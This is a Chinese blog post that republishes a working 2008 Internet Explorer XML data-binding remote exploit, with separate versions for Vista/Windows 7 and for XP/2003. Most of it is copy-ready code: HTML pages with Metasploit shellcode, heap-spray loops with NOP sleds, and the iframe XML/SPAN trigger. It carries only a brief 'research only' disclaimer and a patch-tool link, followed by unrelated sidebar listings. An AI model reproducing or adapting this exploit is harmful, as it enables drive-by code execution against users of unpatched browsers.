微软IE最新XML漏洞利用代码

最新推荐文章于 2019-06-25 15:39:28 发布
原创 最新推荐文章于 2019-06-25 15:39:28 发布 · 106 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文提供了一份针对微软IE浏览器XML解析漏洞的利用代码,适用于不同版本的操作系统,包括VISTA及以上版本和XP等旧版系统。该漏洞可用于远程攻击,但仅供技术研究使用,请勿用于非法目的。

微软IE最新XML漏洞利用代码,仅做技术研究,切勿搞破坏

适用于VISTA及更高版本操作系统的代码(VISTA/SERVER 2008/WINDOWS 7):

ie-sploit.html

<html>

<script>

// k`sOSe 12/10/2008

// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0,Explorer 7.0.6000.16386

// Heap spray address adjusted for Vista - muts / offensive-security.com

// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html

// http://www.offensive-security.com/0day/iesploit-vista.rar

// windows/exec - 141 bytes

// http://www.metasploit.com

// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe

var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");

var block = unescape("%u0c0c%u0c0c");

var nops = unescape("%u9090%u9090%u9090");

while (block.length < 81920) block += block;

var memory = new Array();

var i=0;

for (;i<1000;i++) memory[i] += (block + nops + shellcode);

document.write("<iframe src=\"iframe.html\">");

</script>

</html>

iframe.html

<XML ID=I>

<X>

<C>

<![CDATA[

<image

SRC=http://&#3084;&#3084;.xxxxx.org

>

]]>

</C>

</X>

</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>

<XML ID=I>

</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>

</SPAN>

</SPAN>

适用于WINDOWS旧版本操作系统的代码(XP/2003/2000等):

ie-sploit.html

<html>

<script>

// k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13

// windows/exec - 141 bytes

// http://www.metasploit.com

// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe

var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");

var block = unescape("%u0a0a%u0a0a");

var nops = unescape("%u9090%u9090%u9090");

while (block.length < 81920) block += block;

var memory = new Array();

var i=0;

for (;i<1000;i++) memory[i] += (block + nops + shellcode);

document.write("<iframe src=\"iframe.html\">");

</script>

</html>

iframe.html

<XML ID=I>

<X>

<C>

<![CDATA[

<image

SRC=http://&#2570;&#2570;.xxxxx.org

>

]]>

</C>

</X>

</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>

<XML ID=I>

</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>

</SPAN>

</SPAN>

仅供学习,请勿用作非法用途。

目前微软尚未对该漏洞发布相应的补丁,360安全卫士推出了一款修复工具可以对该漏洞进行修复,修复工具下载地址为http://dl.360safe.com/360fixmsxml.exe

白云v城主
关注
渗透测试漏洞大全
2301_76786857的博客
06-13 1645
由于开发人员编写源码,开放着将可重复使用的代码插入到单个的文件中,并在需要的时候将它们包含在特殊的功能代码文件中,然后包含文件中的代码会被解释执行。应用需要对输入进行检查,不允许用户直接提交未经过验证的数据到服务器,因为这些数据来不可编辑的控件,或者用户没有前端提交的权限,任何可编辑控件必须有阻止恶意的写入或修改的功能。网站登录失败、账号注册、密码找回等功能,有些网站会提示类似“用户名不存在”的错误,攻击者可以通过该提示先猜测出系统存在哪些账号,然后再进一步猜测密码,降低了暴力破解的成本。
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1318
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
堆喷射学习笔记~
weixin_30693183的博客
07-18 2181
分析网页上数据的存储: 堆 IE6 IE7 而言, 快速(在堆块大小与重复喷射次数之间找到平衡点), 稳定(每次堆喷射都能使目标地址指向NOPS) JS 上分配字符串 会变成 BSTR字符串对象,该对象有一个 头信息 + 终止符, 并包含原始字符串经UNICODE转换后的字符串 ...
Microsoft XML Core Services 漏洞分析与利用详解
漏洞利用阶段,报告分别讨论了在Windows XP上使用IE6和IE8的情况。在没有Data Execution Prevention (DEP)保护的IE6中,攻击者可以直接利用堆喷射技术构造POC(Proof of Concept),导致程序崩溃并执行恶意代码。...
TRS cms用户注册漏洞
2ed
06-25 3721
据了解TRS WCM涵盖网站建立、内容服务、内容传递等内容价值链的各个方面,将结构化和非结构化信息提供给所有用户。 既然在外网能访问TRS WCM,那就方便许多了,由于是第一次遇到此系统,所以去wooyun上搜了一下相关漏洞利用方式,发现其实wooyun上公布的对这个系统的漏洞利用方式还是很多的,都是些高危漏洞,其中有三个高危漏洞可以很好的利用一下,TRS WCM多为gov站点使用,不过这里遇到了...
Excel表格通用模板:出租屋水电费自动管理电子表格.xls
09-10
Excel表格通用模板:出租屋水电费自动管理电子表格.xls
prosody-0.12.5-1.el8.tar.gz
09-10
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
计算机网络课程学习心得体会范例.doc
09-10
计算机网络课程学习心得体会范例.doc
自动化专业生产实习报告.docx
09-10
自动化专业生产实习报告.docx
pwauth-2.3.10-24.el8.tar.gz
09-10
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
podman-docker-3.3.1-9.module_el8.5.0+988+b1f0b741.tar.gz
09-10
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
适用于运维场景的通用 Python 脚本框架介绍
09-10
打开下面链接,直接免费下载资源: https://renmaiwang.cn/s/gttyt 面向运维工作的通用型 Python 脚本框架
Excel表格模板:工作计划表.xlsx
09-10
Excel表格模板:工作计划表.xlsx
prometheus-jmx-exporter-0.12.0-6.el8.tar.gz
09-10
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
Excel表格模板:客户资料统计表.xlsx
09-10
Excel表格模板:客户资料统计表.xlsx
xx高速公路路面施工技术段网络计划.doc
09-10
xx高速公路路面施工技术段网络计划.doc
Excel表格通用模板:承兑及票据信息统计表.xls
最新发布
09-10
Excel表格通用模板:承兑及票据信息统计表.xls
prelockd-0.9-1.el8.tar.gz
09-10
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
IIS短文件名漏洞一键利用工具发布
及时关注微软的安全更新,为系统打上最新的安全补丁,补丁往往包含对最新发现漏洞的修复。 #### 强化监测 使用服务器安全监测工具,实时监控服务器状态,发现异常行为立即进行分析和处理。 #### 安全教育 提高管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值